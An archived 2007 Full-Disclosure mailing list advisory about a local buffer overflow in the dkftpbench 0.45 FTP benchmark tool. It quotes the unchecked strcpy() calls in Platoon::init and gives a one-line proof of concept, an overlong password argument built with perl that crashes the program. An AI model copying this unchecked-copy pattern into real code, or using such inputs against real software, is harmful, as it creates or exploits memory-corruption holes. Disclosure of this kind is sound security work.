lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <db4e96660703191232o674ce6degc6e8d7c02fbfacef@mail.gmail.com>
Date: Mon, 19 Mar 2007 20:32:27 +0100
From: starcadi <starcadi@...il.com>
To: listgrok <full-disclosure@...ts.grok.org.uk>
Subject: dkftpbench 0.45 (Platoon:init) Local buffer
	overflow vulnerability

Description:

dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.
Found buffer overflow in Platoon::init function using strcpy() with no
sizelen control.
source: http://www.kegel.com/dkftpbench/

Source error:

in main():
--
int main(int argc, char **argv)
{
	[..]
	const char *arg_username = "anonymous";
	const char *arg_password = "robouser@";

	[..]
		} else if (!strncmp(argv[i], "-u", 2)) {
			arg_username = &argv[i][2];
		} else if (!strncmp(argv[i], "-p", 2)) {
			arg_password = &argv[i][2];

	[..]
	Platoon thePlatoon;
	thePlatoon.init(poller, &sked, arg_filename,
		arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
		arg_hostname, arg_portnum, arg_username, arg_password,
		local_addrs, n_local_addrs);

	[..]
}
--

in Platoon.h:
--
	/// The user name part of the URL to fetch
	char m_username[128];
	/// The password part of the URL to fetch
	char m_passwd[128];
--

in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
	int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
	const char *servername, int port,
	const char *username, const char *passwd,
	struct sockaddr_in *local_addrs, int n_local_addrs)
{
	[..]
	m_port = port;
	m_sked = sked;
	strcpy(m_passwd, passwd);
	strcpy(m_servername, servername);
	strcpy(m_username, username);
	m_verbosity = 0;
	m_local_addrs = local_addrs;
	[..]
}
--

Proof of concept:

$ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"` -v1
 -h127.0.0.1 host name of ftp server
 -P21 port number of ftp server
 -n1 number of users
 -c1 target number of simultaneous connection attempts
 -k2 Start next connection when: 1=immediately, 2=after prev connect complete
 -t0 length of run (in seconds)
 -b3600 desired bandwidth (in bytes per second)
 -B2700 min acceptable per-client bandwidth (in bytes per second)
 -ufederico user name
 -paaaaaa[..]
 -fusenet/rec.juggling/juggling.FAQ.Z file to fetch
 -m1500 bytes per 'packet'
 -v1 verbosity
 -sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
 -a0 use all local interfaces
Using poll()
Segmentation fault
$

-- 
.original http://intel.shacknet.nu/
~ starcadi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ